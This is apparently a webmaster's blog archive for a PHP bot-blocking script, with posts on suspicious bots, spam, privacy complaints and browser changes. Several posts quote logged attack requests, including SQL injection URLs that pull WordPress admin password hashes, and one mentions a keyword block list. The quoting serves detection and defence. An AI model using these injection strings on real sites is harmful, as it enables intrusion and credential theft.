Jul 20, 2016

php/5.{3|2}.{1|2|3|4|5|6|7|8|9|0}{1|2|3|4|5|6|7|8|9|0}

What is php/5.{3|2}.{1|2|3|4|5|6|7|8|9|0}{1|2|3|4|5|6|7|8|9|0}

  
Its showing up from lots of IPS but only once. Doesn't look like it comes back after being blocked.

Mar 30, 2012

New upload

M&M autobam v4.8 has been uploaded. This version adds country ban by ip

Dec 16, 2011

webmasters how to disable google related

From :http://www.lunarlog.com/google-related-privacy/
Reposting: I have not been able to find a way to disable Google related if you have not seen it you had better check out whats showing up on your website.



File a complaint here https://www.ftccomplaintassistant.gov/

Google Related Program and My Privacy Issues

I spent the last cou­ple of weeks updat­ing my main web­site Lunarstu­dio - mostly repro­gram­ming and adding new images. When updat­ing web­sites, most respon­si­ble web­mas­ters and design­ers will run their site through addi­tional browsers, oper­at­ing sys­tems, and test people’s reac­tions to new con­tent. I had a friend look at my site on Sun­day to see if she had any feed­back. Out of the cor­ner of my eye, I noticed a full-width bar appear at the bot­tom of my page on her mon­i­tor. My first reac­tion was “WTF”, fol­lowed by con­cern that some­how I must have uploaded mal­ware to the back-end of my site. The third option which was slightly more wor­ri­some is that some hack­ers got into my site. So I took a closer look, and the bot­tom left read “Google Related” (don’t install this.)

Now, I would never think Google would have released a tool­bar that cov­ered up part of the screen. Not only was it dis­tract­ing from the design I had worked so hard it, but it wouldn’t just affect me but almost every web­mas­ter and designer on the planet. So my next thought that it had to be some mal­ware she acci­den­tally down­loaded over the course of her Inter­net trav­els. Upon even closer inspec­tion, I noticed that it was serv­ing up adver­tise­ments and con­tact infor­ma­tion from com­peti­tors. So some­one look­ing at my site could see another image at the bot­tom of the screen, then decide to go to that web­site instead.

I started to look into this. Sure enough, it’s part of a new, 20-day old Google pro­gram which is a tool­bar exten­sion for Inter­net Explorer and Chrome. ArsTech­nica wrote a con­cise arti­cle on what Google Relate does here. While it might prove use­ful for some users, for web­mas­ters and those con­cerned with pri­vacy, this is an absolute night­mare. It rep­re­sents a major down­fall in Net Neu­tral­ity if this is allowed to carry on. *Aside* — some might argue that Google is not a tele­com, Inter­net Provider, or gov­ern­ment agency and hence doesn’t fall into the argu­ment of threat­en­ing Net Neu­tral­ity. How­ever, I should remind peo­ple that Google has men­tioned that it’s test­ing their Inter­net Pro­vid­ing ser­vices. Also, Android runs on many cell­phones as well as tele­com providers. They’re basi­cally in bed with one another.

There’s sev­eral dif­fer­ent and valid con­cerns, not to men­tion the legal­ity of this program:

1.It inter­feres with a per­son or company’s intended web­site design with­out their permission.
2.It poten­tially dis­tracts an end-user.
3.It slows down a person’s web­site load­ing time. The speed issue is prob­a­bly neg­li­gi­ble, but it’s still there with­out an owner’s permission.
4.It risks hav­ing peo­ple leave your web­site in favor of another. Hold­ing user reten­tion on a landing-page is tough enough, but this just adds fuel to the fire.
5.Due to peo­ple wan­der­ing off one’s web­site, it can jeop­ar­dize web­site owner’s busi­nesses and livelihoods.
6.Google is directly (or indi­rectly) prof­i­teer­ing from some­one else’s work with­out their permission.
7.This is poten­tially part of their AdWords pro­gram, which makes money off of advertisements.
8.It allows for Google to mon­i­tor your brows­ing habits, even when not using Google search. It’s basi­cally spy­ing on your activities.
9.It poten­tially opens up the door for fur­ther abuse.
10.It threat­ens Google’s com­peti­tors (Yahoo!, Bing, and other search engines.) If suc­cess­ful, com­peti­tors might also have to roll out sim­i­lar tool­bars or methods.
11.It could become a per­ma­nent part of Google Chrome.
Now, there’s some use­ful­ness to the end-user. It wouldn’t be fair for me to men­tion the Google Related neg­a­tives with­out the positives:

1.Pro­vides directions.
2.Pro­vides alter­na­tive solu­tions for some­one look­ing for a ser­vice or help.
I was almost pos­i­tive Google would pro­vide web­mas­ters with a method to take this off of owner’s web­sites through the use of META tags, but my searches for that method turned up empty. Instead, I came across other “unap­proved” meth­ods of using CSS code to dis­able the iframe, either by mov­ing the tool­bar off-screen, or by hid­ing the iframe com­pletely. Unfor­tu­nately, I tried these meth­ods and it didn’t work. It seems that Google caught on to web­mas­ters chang­ing their CSS code, and in turn updated their own to pre­vent us from doing so.

Since then, I’ve brought it to the atten­tion of some friends on Face­book, how­ever I think my con­cern has largely fallen on deaf ears which is under­stand­able. I’ve also writ­ten on the Google Forum where you can see there my con­cern is #6. Some might call it an over­re­ac­tion, but I think I’m fully jus­ti­fied here. The peo­ple report­ing this prob­lem is so low at the moment because Google Related is just start­ing to get atten­tion. This is part of the rea­son why I’m writ­ing about it on my blog — it’s to bring atten­tion to this.

My main issue is that Google is intrud­ing upon my work and busi­ness with­out per­mis­sion. The nail in the cof­fin is that they are also poten­tially prof­i­teer­ing with­out my per­mis­sion too. I think it’s just a mat­ter of time before Google is:

1.Sued by competitors.
2.Depart­ment of Jus­tice goes after them and tries to break up the monopoly.
3.Pub­lic out­rage from the web­mas­ters com­mu­nity gets out of control.
4.Or they dis­able it before it gets to any of the points listed above.
I hope I am overly con­cerned, and that Google dis­ables their new pro­gram almost as soon as it has started. How­ever, it blows my mind how this idea got past scores of lawyers, exec­u­tives, man­age­ment, and employ­ees at a bil­lion dol­lar com­pany in the first place. If you agree with my con­cerns, please pro­mote this arti­cle and also express your con­cern on the Google Related Forum. If you dis­agree, I’m still inter­ested in hear­ing your views

Mar 11, 2011

"Script Injections" list

Bots vs Browsers - has a new list of all injection atempts.

If your keeping up with this you need to look through this list and add the keywords to block to the hackers.txt file.

Mar 8, 2011

mas email problems

I have just discovered that the email option of my script can trigger the mas email alarms on the free host. They use this alarnm to stop spammers.

If your running the script on a free host you need to disable the emails until I can build a outbox system that will send merge the emails into 1 message once a day.

go into autoban and change all mail commands to
//mail

182.114.206.25 hn.kd.ny.adsl union injection hacker

20and%205=6%20union%20select%200x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E,0x5E5B7D7E%20--

from ip 182.114.206.25 hn.kd.ny.adsl

Aug 26, 2010

as13448.com traffic

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SU 2.011; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.1)
All Hits From static-208-80-194-34.as13448.com 208.80.194.34


I am getting a lot of bot traffic from lots of ips on subdomains of as13448.com
The website as13448.com is not a ISP so all of those ips need to be blocked.

May 24, 2010

mylife.com privacy violations.

Mylife.com is running TV advertisments and getting a lot of traffic so I checked them out and was shocked to see that when you go to the site and enter your name approx age and zip that the system will come back to you and display your XXX (private info)

Check it out yourself and once your upset help by complaining abbout this huge privacy violation. They are helping create identity fraud.

File a complaint here https://www.ftccomplaintassistant.gov/

And you may also want to go to www.privacyrights.org and report this so they can start tracking this company. http://www.privacyrights.org/contact

It is likely that they will not have this information for all states. If they do display private info on you please let us know.

Also see www.complaintsboard.com

Also see http://www.consumeraffairs.com/online/mylife.html


Also see Just say no to Mylife.com

Better Business Bureau
This company practices what the Los Angeles Better Business Bureau calls negative option cancellation. In this sales strategy, customers agree to pay for services unless they cancel within a specified period of time. Members are required to cancel prior to the initial anniversary date to avoid continuing annual charges to their credit cards.[6]

Complaints from customers not resolved in a satisfactory manner caused the Los Angeles Better Business Bureau to rate Reunion.com 'F'.[7]

The BBB was concerned that the company used misleading advertising practices by e-mailing customers advising them that people 'may' be searching for them, and offers them to become paid members to find the identity of any people that may search for them in the future. In its FAQ section, the Reunion.com site describes this feature as follows: "'Who's Searching For You' will reveal the listed names of the specific users who have performed a search using your first and last (current or Maiden) names and your age range within 5 years of your listed date of birth and is still saved in their Search History'.[8]

Feb 7, 2010

New York spam on Road Runner

NYC Rentals
nestseekers.com/Properties/Rentals/Manhattan
manhattanadmin@gmail.com
74.68.123.67 Submitted on 2010/02/06 at 7:25pm
very nice blog.

very nice blog. manhattanadmin@gmail.comNYC
Rentalshttp://www.nestseekers.com/Properties/Rentals/Manhattanspam

1 #
NYC Apartments
nestseekers.com/Properties/Rentals/Manhattan
manhattanadmin@gmail.com
74.68.123.67 Submitted on 2010/02/06 at 5:44pm
interesting.


1 #
NYC Rentals
nestseekers.com/Properties/Rentals/Manhattan
manhattanadmin@gmail.com
74.68.123.67 Submitted on 2010/02/06 at 5:28pm
very nice blog.



1 #
Free Image Hosting
imagehosting21.com
admin@imagehosting21.com
74.68.123.67 Submitted on 2010/02/06 at 10:45am
good blog keep it up.

good blog keep it up. admin@imagehosting21.comFree Image
Hostinghttp://www.imagehosting21.comspam


1 #
Free Image Hosting
imagehosting21.com
admin@imagehosting21.com
74.68.123.67


Sent a complaint to RR admin and got this crap back. Looks like RR does not care about blog spam. I already sent them the time and IP of the abuser. And they ignored that.


Hello,

Road Runner supports the free flow of information and ideas over the Internet. Road Runner does not
actively monitor nor does Road Runner exercise editorial control over the content of any web site,
electronic mail transmission, mailing list, news group or other material created or accessible over
Road Runner services.


If you feel that a Road Runner subscribers activities constitute harassment and have contact
information for them, please write them an email, CCing Abuse@rr.com, requesting that they "cease
and desist" contact with you.


If you receive further contact from the Road Runner subscriber after that point, or do not have
contact information for them: DO NOT REPLY or correspond with that person further. Please instead
forward all documentation to abuse@rr.com, which should include: full email headers or webserver
logs showing posts made on a message board or other Internet forum (these would typically be
obtained from the administration of that site). Logs would need to contain the following
information, for Road Runner to process them: Date of Incident, Time of Incident, Time Zone,
Offender IP, URL of site or offending posts. Road Runner will not accept logs that are not in plain
text (ascii) format. Do not attach files to your e-mail. All logs must be included in the body of
the message.

Thank you for taking the time to contact Road Runner.

- Road Runner Abuse [SM]

Jun 30, 2009

wrangler.websitewelcome.com bot

Agent: -NO AGENT-
74.52.200.178 wrangler.websitewelcome.com

Just what is this bot. It doesnt have a useragent and the website websitewelcome.com has no info on it just a email contact address.

websitewelcome.com added to the block list

useragent spamer www.ongarofrancesco.org

Agent: (a href="http://www.ongarofrancesco.org">Independent Security Researcher(/a> Independent Security Researcher(/a>" target=\_BLANK">
79.45.39.47 host47-39-dynamic.45-79-r.retail.telecomitalia.it

This bot tries to spam your useragent logs that some sites post with links to a website at www.ongarofrancesco.org

This looks to be some hacker ref site. The bot is from Italy

This just goes to show why you should not have scripts on your site that displays the useragents that you have logged to the internet. Because they can contain HTML

Jun 24, 2009

IE 8 breaks subdomains making them hard to read using domain highlighting

Domain Highlighting in Internet Explorer 8 (IE8) now blanks the subdomain and following text after the domain.

Image Hosted by ImageShack.us


This is nuts it makes this site read blogger.com and you can not see the subdomain who's lamo ideal is this. Its one thing to make the main domain a diff color its another to hide the entire URL.

Someone has to find a way around this must be some way you can higlight the URL bar using java so the subdomain will be visable. Or someway to force IE8 into ie7 mode. We own our subdomains and M$ has no right to blank them out. They are part of our domain names and part of our keywork usage.


This has to be fixed.

Microsoft is taking away our legal use of subdomains.
Websites who use subdomains are not crooks we are legaly using 1 domain to create many websites. Just because some crook used a subdomain they should not be hidden.


Zdnet says IE8 puts dim wits ahead of tech savvy.

aidanwalsh.net says
why do you have to obfuscate the rest of the URL information by default? No part of a URL is irrelevant, and information contained in URLs is becoming more and more relevant as time goes on (logically structured URLs, URL based identity management, etc). Why do I need to hold my mouse over the address bar to be able to see this? Surely there are better ways to emphasise the domain block of the URL? Embolden it. Change the colour of the domain, not the rest of the URL.



domain highlighting, ie 8 domain name greayed out, ie8 address bar subdomain, ie8 subdomains broken, making the subdomain visible in ie8

Jan 20, 2009

strange code on wp blog detected

mmautoban has detected the following code being used on a WP blog.

Antyone know what this is.

/functionnumber-%20iterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20index%20=%20-number-%20slices%20=%20-%20array%20=%20this.toArray;%20%20%20%20while%20index%20+=%20number%20%20array.length%20%20%20%20%20%20slices.pusharray.sliceindex-%20index+number;%20%20%20%20return%20slices.collectiterator-%20context;%20%20

/functionfilter-%20iterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20results%20=%20;%20%20%20%20if%20Object.isStringfilter%20%20%20%20%20%20filter%20=%20new%20RegExpfilter;%20%20%20%20this.eachfunctionvalue-%20index%20%20%20%20%20%20%20if%20filter.matchvalue%20%20%20%20%20%20%20%20results.pushiteratorvalue-%20index;%20%20%20%20;%20%20%20%20return%20results;%20%20

/functioniterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20result;%20%20%20%20this.eachfunctionvalue-%20index%20%20%20%20%20%20%20value%20=%20iteratorvalue-%20index;%20%20%20%20%20%20if%20result%20==%20undefined%20%20value%20=%20result%20%20%20%20%20%20%20%20result%20=%20value;%20%20%20%20;%20%20%20%20return%20result;%20%20


/functioniterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20result;%20%20%20%20this.eachfunctionvalue-%20index%20%20%20%20%20%20%20value%20=%20iteratorvalue-%20index;%20%20%20%20%20%20if%20result%20==%20undefined%20%20value%20%20result%20%20%20%20%20%20%20%20result%20=%20value;%20%20%20%20;%20%20%20%20return%20result;%20%20 GET

/functioniterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator?%20iterator.bindcontext%20:%20Prototype.K;%20%20%20%20var%20trues%20=%20-%20falses%20=%20;%20%20%20%20this.eachfunctionvalue-%20index%20%20%20%20%20%20%20iteratorvalue-%20index%20?%20%20%20%20%20%20%20%20trues%20:%20falses.pushvalue;%20%20%20%20;%20%20%20%20return%20trues-%20falses;%20%20



/functioniterator-%20context%20%7B%20%20%20%20iterator%20=%20iterator.bindcontext;%20%20%20%20return%20this.mapfunctionvalue-%20index%20%7B%20%20%20%20%20%20return%20%7Bvalue:%20value-%20criteria:%20iteratorvalue-%20index%7D;%20%20%20%20%7D.sortfunctionleft-%20right%20%7B%20%20%20%20%20%20var%20a%20=%20left.criteria-%20b%20=%20right.criteria;%20%20%20%20%20%20return%20a%20%3C%20b?%20-1%20:%20a%20%20b%20?%201%20:%200;%20%20%20%20.pluckvalue;%20%20



%20null%20:%20fillWith;%20%20%20%20return%20this.eachSlice(number-%20function%20(slice)%20{while%20(slice.length%20%3C%20number)%20{slice.push(fillWith);}return%20slice;});}


It has about 15 other version I suspect it is some type of atack.
Unless some plugin is malfunctioning.
Anyone have any info what this code is?

Jan 15, 2009

OSCommerce mods

OScommerce Notes
===============
A rare bug has been detected in OScommerce. If the customer does not select a payment at checkout the browser is redirected to

/checkout_payment.php?error_message=Please+select+a+payment+method+for+your+order

This generates a +select+ injection hack detection in mmautoban.
To prevent this error edit your OSCommerce english.php file and change the error statement from
Please Select to Please Pick
this will prevent customers from getting banned.
It is unknown if other such errors exist in other places or other programs.
If you see any please report them.

Dec 3, 2008

'mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol' wordpress hacker

Just detected this hacker. the ip is block by no-more-funn.moensted.dk

What is this useragent? (k1b compatible; rss 6.0; windows sot 5.1 security kol)

www._____.com/index.php?cat=%2527+UNION+SELECT+CONCAT(666-CHAR(58)-user_pass-CHAR(58)-666-CHAR(58))+FROM+wp_users+where+id=1/*
Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol)
58.241.255.38

www._____.com/index.php?cat=999+UNION+SELECT+null-CONCAT(666-CHAR(58)-user_pass-CHAR(58)-666-CHAR(58))-null-null-null+FROM+wp_users+where+id=1/*
Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol)
58.241.255.38

www._____.com/wp-trackback.php?p=1
Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol)
58.241.255.38

www.____.com/xmlrpc.php
Agent: mozilla/4.0 (k1b compatible; rss 6.0; windows sot 5.1 security kol)
58.241.255.38